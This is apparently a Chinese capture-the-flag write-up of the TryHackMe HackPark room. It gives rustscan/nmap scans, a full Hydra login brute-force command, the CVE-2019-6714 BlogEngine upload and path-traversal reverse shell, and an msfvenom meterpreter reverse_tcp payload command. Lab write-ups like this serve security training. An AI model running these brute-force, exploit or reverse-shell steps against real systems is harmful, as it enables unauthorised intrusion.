【THM】offensive-hackpark

2025-04-24 1 0

Hydra 暴力破解

使用 Hydra 暴力登录网站,识别并使用公共漏洞,然后升级在此 Windows 计算机上的权限!

使用 Hydra、RCE 和 WinPEAS 入侵 Windows

用rustscan快速扫描

rustscan -a IP --range 0-65535 -- -sV -sV -oN hackpark.nmap

rustscan怎么用的之前的文章已经介绍过了

https://mp.weixin.qq.com/s/l4ko6-75deWINIq4VoDglg

【THM】offensive-hackpark插图

如果用nmap

nmap -Pn -sC -sV -sS -p IP

【THM】offensive-hackpark插图1

访问80端口,看到小丑的图片,保存下载放到google识图中,发现是pennywise(小丑回魂)

【THM】offensive-hackpark插图2

使用 Hydra 暴力破解登录,先寻找登录口,目录扫描

【THM】offensive-hackpark插图3

【THM】offensive-hackpark插图4

他们都返回了 403,但/archive给了这个页面,但里面没有任何有趣的内容

【THM】offensive-hackpark插图5

我们之前访问的主页中的选项选项卡有一个登录选项,右键单击登录表单,检查元素,然后读取方法字段中的值来检查表单发出的请求。如果您通过 BurpSuite 拦截流量,也可以识别这一点(其他 HTTP 方法可以在此处找到)。https://www.w3schools.com/tags/ref_httpmethods.asp

先用burp抓包查看post参数

【THM】offensive-hackpark插图6

hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt {IP} http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=tH3nyjHWshy31CD1HUL212Q2sUlmbJdmA3PH9QrQ49rHSGqip79fK8fK5w4R7A%2BFv2G31xXxSwbuy6esy7JCppaHYfeaUtqtFg4aegSGfDLkkKfhuVa81dv5v2mFDlGJ1If8gDK4WByANbsudxOHKaJxujKDU8OBewkI6AFhnRNcbUma&__EVENTVALIDATION=oztmFtnEAgIEFOmV8sjMAU%2BW5%2BIFfkBcHNipRMg%2FufY3Fjp8pw8gZaDh4fKcBwNZYLmHVX0EIOBoThym43y1HuSP9JPodblTBkUym%2F4InzzxcNfFcy00UcAjFbfzsef8VMHNHfXOxlLnJqSLDO34qyWBaSkrdN5QnpX%2BzDvzCkb0Q3ek&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

hydra怎么用我之前的文章也介绍过

https://www.freebuf.com/articles/web/427704.html

【THM】offensive-hackpark插图7

反弹shell

登录之后找到about发现是BlogEngine Version: 3.3.6.0

在 searchsploit 中查找此特定版本的漏洞,结果显示

【THM】offensive-hackpark插图8

有 3 个 RCE 漏洞searchsploit -m aspx/webapps/46353.cs ,看到CVE-2019-6714

该漏洞告诉我们需要采取哪些步骤才能获得返回我们机器的反向 shell。

【THM】offensive-hackpark插图9

将漏洞利用代码重命名为“PostView.ascx”

更改漏洞利用代码中的 IP 和端口

以管理员身份登录应用程序,点击“内容”->“帖子”->“欢迎来到 Hackpark”->“文件管理器”,点击“上传”,上传 PostView.ascx 并保存,设置 nc 监听器并 访问 exploitdb 上列出的以下 URL http://<ip>/?theme=../../App_Data/files

网页持续加载,这意味着已成功获取 reverse-shell

从 CONTENT 中选择一篇文章。 打开菜单栏最右侧的文件管理器并选择上传。 选择您创建的PostView.ascx,它将被上传。

【THM】offensive-hackpark插图10

http://<ip>/?theme=../../App_Data/files

【THM】offensive-hackpark插图11

Windows 权限提升

建立稳定的反向shell

我们目前设置的反向shell(Netcat 会话)是不稳定的,因此我们将创建一个稳定的连接。
作为一种流动

  1. 使用 msfvenom 创建有效载荷。
  2. 一旦建立,反向 shell 就会用于将有效载荷传送到目标。
  3. 使用msfconsole建立稳定的连接环境。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=1234 -e x64/shikata_ga_nai -f exe -overse.exe

不运行了,上一个房间用的有效负载直接拿来用

【THM】offensive-hackpark插图12


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

打靶日记——NullByte
检测与应对新型国家级网络持久化攻击技术
高负荷安全运营中心如何有效分级处理威胁情报警报
WordPress User Registration & Membership 权限提升及网站接管利用漏洞详情(CVE-2025-2563)
网络犯罪新宠:SheByte推出q99订阅制钓鱼服务
Java Reflection:java反序列化基础详解

发布评论